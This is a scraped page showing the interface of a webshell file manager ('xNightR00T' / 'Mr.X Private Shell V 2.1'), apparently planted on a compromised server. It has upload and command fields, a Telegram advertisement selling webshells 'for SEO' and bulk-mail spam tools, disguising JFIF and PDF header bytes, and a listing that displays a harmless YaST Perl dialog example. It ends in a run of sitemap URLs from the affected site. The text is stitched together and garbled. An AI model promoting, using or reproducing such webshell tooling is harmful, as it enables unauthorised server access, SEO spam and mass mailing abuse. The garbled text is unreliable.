xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#! /usr/bin/perl -w
# Ported core/libyui/doc/examples/Label3.ycp
# - remove backticks:
# -- use helper functions instead of YCP terms
# -- use strings instead of YCP symbols (except in Value)

use YaST::YCP qw(:DATA :UI);
YaST::YCP::Import "UI";
YaST::YCP::init_ui ($ARGV[0] || "qt");

# Build dialog with one label, 4 Beatles buttons and an OK button.
UI->OpenDialog(
	       VBox(
		    Label("Select your favourite Beatle:"),
		    Label(id("beatle"), opt("outputField"), "   "),
		    HBox(
			 PushButton(id("john"),		"&John"),
			 PushButton(id("paul"),		"&Paul"),
			 PushButton(id("george"),	"&George"),
			 PushButton(id("ringo"),	"&Ringo")),
		    PushButton(id("ok"), "&OK")
		   )
	      );

# Wait for user input.
my $button;
# Input loop that only the OK button will leave.
# The 4 Beatles buttons will just propose a name.
do {
    # UserInput gives us the id, which is a YaST::YCP::Symbol
    $button = UI->UserInput()->value();

    if    ( $button eq "john" )		{ UI->ChangeWidget(id("beatle"), Symbol("Value"), "John Lennon"); }
    elsif ( $button eq "paul" )		{ UI->ChangeWidget(id("beatle"), Symbol("Value"), "Paul McCartney"); }
    elsif ( $button eq "george" )	{ UI->ChangeWidget(id("beatle"), Symbol("Value"), "George Harrison"); }
    elsif ( $button eq "ringo" )	{ UI->ChangeWidget(id("beatle"), Symbol("Value"), "Ringo Starr" ); }

    # Recalculate the layout - this is necessary since the label widget
    # doesn't recompute its size upon changing its value.
    UI->RecalcLayout();

} until ( $button eq "ok" );


# Retrieve the label's value.
# Perl note: Symbol is necessary for now
my $name = UI->QueryWidget(id("beatle"), Symbol("Value"));

# Close the dialog.
# Remember to read values from the dialog's widgets BEFORE closing it!
UI->CloseDialog();

# Pop up a new dialog to echo the input.
UI->OpenDialog(
	       VBox(
		    VSpacing(),
		    HBox(
			 Label("You selected:"),
			 Label(opt("outputField"), $name),
			 HSpacing()
			),
		    PushButton(opt("default"), "&OK")
		   )
	      );
UI->UserInput();
UI->CloseDialog();

Filemanager

Name Type Size Permission Actions
helloui-old.pl File 415 B 0644
helloui.pl File 351 B 0644
ui.pl File 2.02 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml